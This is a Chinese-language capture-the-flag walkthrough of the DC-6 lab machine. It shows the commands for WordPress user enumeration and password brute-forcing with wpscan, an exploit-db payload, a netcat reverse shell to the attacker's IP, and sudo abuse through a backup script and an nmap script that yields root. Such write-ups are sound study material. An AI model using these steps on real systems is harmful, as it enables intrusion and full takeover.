DC-6靶机实战练习

环境:VMware 15虚拟机软件

DC-6靶机IP地址:192.168.146.136

Kali的IP地址:192.168.146.130

第一步 主机扫描

[nmap -sP 192.168.0/24]
DC-6靶机实战练习

第二步 扫描开放的端口

[nmap -sV 192.168.146.136]
DC-6靶机实战练习

第三步 访问80端口—此时需要重定向设置

  • linux下设置
    DC-6靶机实战练习

  • window下设置
    DC-6靶机实战练习DC-6靶机实战练习

第四步 扫描后台目录 以及账号密码

[wpscan --url http://wordy/ -e u]
adminsarahgrahammarkjens-
DC-6靶机实战练习DC-6靶机实战练习DC-6靶机实战练习

第五步 获取登录账号和密码

DC-6靶机实战练习
[wpscan --url http://wordy/ -U aa.txt -P passwd]markhelpdesk01
方法一:使用kali里面的 wpscan**
DC-6靶机实战练习DC-6靶机实战练习
方法二:使用burpSuit抓包**-
DC-6靶机实战练习DC-6靶机实战练习

第六步 登录mark账号-

DC-6靶机实战练习DC-6靶机实战练习

第七步 漏洞利用

我们直接复制html进行修改[cp /usr/share/exploitdb/exploits/php/webapps/45274.html 45274.html]
[vim 45274.html]
DC-6靶机实战练习DC-6靶机实战练习

第八步 kali开启临时http服务 访问45274.html页面

[python -m SimpleHTTPServer 80]
DC-6靶机实战练习DC-6靶机实战练习
[nc -lvvp 9999]
方法二 burpsuit抓包 进行反弹shell
[nc 192.168.146.130 9999 -e /bin/bash]
DC-6靶机实战练习

第九步 切换shell进入交互模式,并进入mark的家目录下查找文件

python -c ‘import pty;pty.spawn("/bin/bash")’
[cd /home/mark/stuff]
[cat things-to-do.txt]
获得 账号/密码 user: graham - GSo7isUM1D4
DC-6靶机实战练习

第十步 切换 graham

[ssh [email protected]]
[sudo -l]
[cd /home/jens/ ]
[cat backups.sh]
是对web的文件进行打包备份的
DC-6靶机实战练习

第十一步 写入脚本,切换到jens账号

[echo “/bin/bash” >> backups.sh ]
[cat backups.sh ]
[sudo -u jens ./backups.sh]
DC-6靶机实战练习

第十二步 nmap提权

[echo ‘os.execute("/bin/sh")’ > getshell]
[sudo nmap --script=getshell]
[cd /root]
[cat theflag.txt]
DC-6靶机实战练习

免责声明本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!由于使用不当造成的后果上传者概不负责!